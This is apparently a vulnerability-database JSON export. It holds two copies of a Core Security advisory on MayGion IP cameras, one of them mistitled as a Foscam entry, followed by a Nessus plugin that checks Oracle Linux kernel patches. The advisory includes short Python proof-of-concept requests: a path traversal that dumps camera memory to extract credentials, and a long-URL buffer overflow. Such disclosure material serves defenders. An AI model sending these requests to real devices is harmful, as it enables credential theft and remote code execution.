{"seebug": [{"lastseen": "2017-11-19T15:04:06", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n \r\nMayGion IP Cameras multiple vulnerabilities\r\n \r\n1. *Advisory Information*\r\n \r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n \r\n3. *Vulnerability Description*\r\n \r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n \r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n \r\n4. *Vulnerable Packages*\r\n \r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n \r\n5. *Non-Vulnerable Packages*\r\n \r\n . H.264 ipcam firmware 2013.04.22.\r\n \r\n6. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\n7.1. *User Credentials Leaked via Path Traversal*\r\n \r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. 
Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n7.2. *Buffer overflow*\r\n \r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n8. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n \r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n \r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n \r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n \r\n9. *References*\r\n \r\n[1] http://www.maygion.com\r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n13. 
*PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "published": "2014-07-01T00:00:00", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1604", "CVE-2013-1605"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79467", "id": "SSV:79467", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T14:17:39", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n \r\nMayGion IP Cameras multiple vulnerabilities\r\n \r\n1. *Advisory Information*\r\n \r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n \r\n3. *Vulnerability Description*\r\n \r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n \r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n \r\n4. *Vulnerable Packages*\r\n \r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n \r\n5. 
*Non-Vulnerable Packages*\r\n \r\n . H.264 ipcam firmware 2013.04.22.\r\n \r\n6. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\n7.1. *User Credentials Leaked via Path Traversal*\r\n \r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n7.2. *Buffer overflow*\r\n \r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n8. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n \r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n \r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n \r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n \r\n9. 
*References*\r\n \r\n[1] http://www.maygion.com\r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n13. 
*PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "published": "2014-07-01T00:00:00", "title": "FOSCAM IP-Cameras Improper Access Restrictions", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1604", "CVE-2013-1605"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-80695", "id": "SSV:80695", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "nessus": [{"lastseen": "2021-01-17T12:44:22", "description": "From Red Hat Security Advisory 2009:0331 :\n\nUpdated kernel packages that resolve several security issues and fix\nvarious bugs are now available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update addresses the following security issues :\n\n* a buffer overflow was found in the Linux kernel Partial Reliable\nStream Control Transmission Protocol (PR-SCTP) implementation. This\ncould, potentially, lead to a denial of service if a Forward-TSN chunk\nis received with a large stream ID. (CVE-2009-0065, Important)\n\n* a memory leak was found in keyctl handling. A local, unprivileged\nuser could use this flaw to deplete kernel memory, eventually leading\nto a denial of service. (CVE-2009-0031, Important)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size file in '/sys/devices/platform/dell_rbu/'. (CVE-2009-0322,\nImportant)\n\n* a deficiency was found in the libATA implementation. 
This could,\npotentially, lead to a denial of service. Note: by default, '/dev/sg*'\ndevices are accessible only to the root user. (CVE-2008-5700, Low)\n\nThis update also fixes the following bugs :\n\n* when the hypervisor changed a page table entry (pte) mapping from\nread-only to writable via a make_writable hypercall, accessing the\nchanged page immediately following the change caused a spurious page\nfault. When trying to install a para-virtualized Red Hat Enterprise\nLinux 4 guest on a Red Hat Enterprise Linux 5.3 dom0 host, this fault\ncrashed the installer with a kernel backtrace. With this update, the\n'spurious' page fault is handled properly. (BZ#483748)\n\n* net_rx_action could detect its cpu poll_list as non-empty, but have\nthat same list reduced to empty by the poll_napi path. This resulted\nin garbage data being returned when net_rx_action calls list_entry,\nwhich subsequently resulted in several possible crash conditions. The\nrace condition in the network code which caused this has been fixed.\n(BZ#475970, BZ#479681 & BZ#480741)\n\n* a misplaced memory barrier at unlock_buffer() could lead to a\nconcurrent h_refcounter update which produced a reference counter leak\nand, later, a double free in ext3_xattr_release_block(). Consequent to\nthe double free, ext3 reported an error\n\next3_free_blocks_sb: bit already cleared for block [block number]\n\nand mounted itself as read-only. With this update, the memory barrier\nis now placed before the buffer head lock bit, forcing the write order\nand preventing the double free. (BZ#476533)\n\n* when the iptables module was unloaded, it was assumed the correct\nentry for removal had been found if 'wrapper->ops->pf' matched the\nvalue passed in by 'reg->pf'. If several ops ranges were registered\nagainst the same protocol family, however, (which was likely if you\nhad both ip_conntrack and ip_contrack_* loaded) this assumption could\nlead to NULL list pointers and cause a kernel panic. 
With this update,\n'wrapper->ops' is matched to pointer values 'reg', which ensures the\ncorrect entry is removed and results in no NULL list pointers.\n(BZ#477147)\n\n* when the pidmap page (used for tracking process ids, pids)\nincremented to an even page (ie the second, fourth, sixth, etc. pidmap\npage), the alloc_pidmap() routine skipped the page. This resulted in\n'holes' in the allocated pids. For example, after pid 32767, you would\nexpect 32768 to be allocated. If the page skipping behavior presented,\nhowever, the pid allocated after 32767 was 65536. With this update,\nalloc_pidmap() no longer skips alternate pidmap pages and allocated\npid holes no longer occur. This fix also corrects an error which\nallowed pid_max to be set higher than the pid_max limit has been\ncorrected. (BZ#479182)\n\nAll Red Hat Enterprise Linux 4 users should upgrade to these updated\npackages, which contain backported patches to resolve these issues.\nThe system must be rebooted for this update to take effect.", "edition": 26, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : kernel (ELSA-2009-0331)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5700", "CVE-2009-0322", "CVE-2009-0065", "CVE-2009-0031"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-hugemem", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-xenU-devel", "p-cpe:/a:oracle:linux:kernel-xenU", "p-cpe:/a:oracle:linux:kernel-smp-devel", "p-cpe:/a:oracle:linux:kernel-largesmp", "p-cpe:/a:oracle:linux:kernel-smp", "p-cpe:/a:oracle:linux:kernel-hugemem-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-largesmp-devel"], "id": "ORACLELINUX_ELSA-2009-0331.NASL", "href": "https://www.tenable.com/plugins/nessus/67814", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# 
extracted from Red Hat Security Advisory RHSA-2009:0331 and \n# Oracle Linux Security Advisory ELSA-2009-0331 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67814);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5700\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0322\");\n script_bugtraq_id(33113);\n script_xref(name:\"RHSA\", value:\"2009:0331\");\n\n script_name(english:\"Oracle Linux 4 : kernel (ELSA-2009-0331)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:0331 :\n\nUpdated kernel packages that resolve several security issues and fix\nvarious bugs are now available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update addresses the following security issues :\n\n* a buffer overflow was found in the Linux kernel Partial Reliable\nStream Control Transmission Protocol (PR-SCTP) implementation. This\ncould, potentially, lead to a denial of service if a Forward-TSN chunk\nis received with a large stream ID. (CVE-2009-0065, Important)\n\n* a memory leak was found in keyctl handling. A local, unprivileged\nuser could use this flaw to deplete kernel memory, eventually leading\nto a denial of service. (CVE-2009-0031, Important)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. 
This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size file in '/sys/devices/platform/dell_rbu/'. (CVE-2009-0322,\nImportant)\n\n* a deficiency was found in the libATA implementation. This could,\npotentially, lead to a denial of service. Note: by default, '/dev/sg*'\ndevices are accessible only to the root user. (CVE-2008-5700, Low)\n\nThis update also fixes the following bugs :\n\n* when the hypervisor changed a page table entry (pte) mapping from\nread-only to writable via a make_writable hypercall, accessing the\nchanged page immediately following the change caused a spurious page\nfault. When trying to install a para-virtualized Red Hat Enterprise\nLinux 4 guest on a Red Hat Enterprise Linux 5.3 dom0 host, this fault\ncrashed the installer with a kernel backtrace. With this update, the\n'spurious' page fault is handled properly. (BZ#483748)\n\n* net_rx_action could detect its cpu poll_list as non-empty, but have\nthat same list reduced to empty by the poll_napi path. This resulted\nin garbage data being returned when net_rx_action calls list_entry,\nwhich subsequently resulted in several possible crash conditions. The\nrace condition in the network code which caused this has been fixed.\n(BZ#475970, BZ#479681 & BZ#480741)\n\n* a misplaced memory barrier at unlock_buffer() could lead to a\nconcurrent h_refcounter update which produced a reference counter leak\nand, later, a double free in ext3_xattr_release_block(). Consequent to\nthe double free, ext3 reported an error\n\next3_free_blocks_sb: bit already cleared for block [block number]\n\nand mounted itself as read-only. With this update, the memory barrier\nis now placed before the buffer head lock bit, forcing the write order\nand preventing the double free. 
(BZ#476533)\n\n* when the iptables module was unloaded, it was assumed the correct\nentry for removal had been found if 'wrapper->ops->pf' matched the\nvalue passed in by 'reg->pf'. If several ops ranges were registered\nagainst the same protocol family, however, (which was likely if you\nhad both ip_conntrack and ip_contrack_* loaded) this assumption could\nlead to NULL list pointers and cause a kernel panic. With this update,\n'wrapper->ops' is matched to pointer values 'reg', which ensures the\ncorrect entry is removed and results in no NULL list pointers.\n(BZ#477147)\n\n* when the pidmap page (used for tracking process ids, pids)\nincremented to an even page (ie the second, fourth, sixth, etc. pidmap\npage), the alloc_pidmap() routine skipped the page. This resulted in\n'holes' in the allocated pids. For example, after pid 32767, you would\nexpect 32768 to be allocated. If the page skipping behavior presented,\nhowever, the pid allocated after 32767 was 65536. With this update,\nalloc_pidmap() no longer skips alternate pidmap pages and allocated\npid holes no longer occur. This fix also corrects an error which\nallowed pid_max to be set higher than the pid_max limit has been\ncorrected. 
(BZ#479182)\n\nAll Red Hat Enterprise Linux 4 users should upgrade to these updated\npackages, which contain backported patches to resolve these issues.\nThe system must be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-March/000912.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2008/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-5700\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0322\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2009-0331\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-devel-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-doc-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-doc-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif 
(rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"ia64\", reference:\"kernel-largesmp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"ia64\", reference:\"kernel-largesmp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", 
reference:\"kernel-xenU-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:22", "description": "From Red Hat Security Advisory 2009:0326 :\n\nUpdated kernel packages that fix several security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* memory leaks were found on some error paths in the icmp_send()\nfunction in the Linux kernel. This could, potentially, cause the\nnetwork connectivity to cease. (CVE-2009-0778, Important)\n\n* Chris Evans reported a deficiency in the clone() system call when\ncalled with the CLONE_PARENT flag. This flaw permits the caller (the\nparent process) to indicate an arbitrary signal it wants to receive\nwhen its child process exits. This could lead to a denial of service\nof the parent process. (CVE-2009-0028, Moderate)\n\n* an off-by-one underflow flaw was found in the eCryptfs subsystem.\nThis could potentially cause a local denial of service when the\nreadlink() function returned an error. (CVE-2009-0269, Moderate)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. 
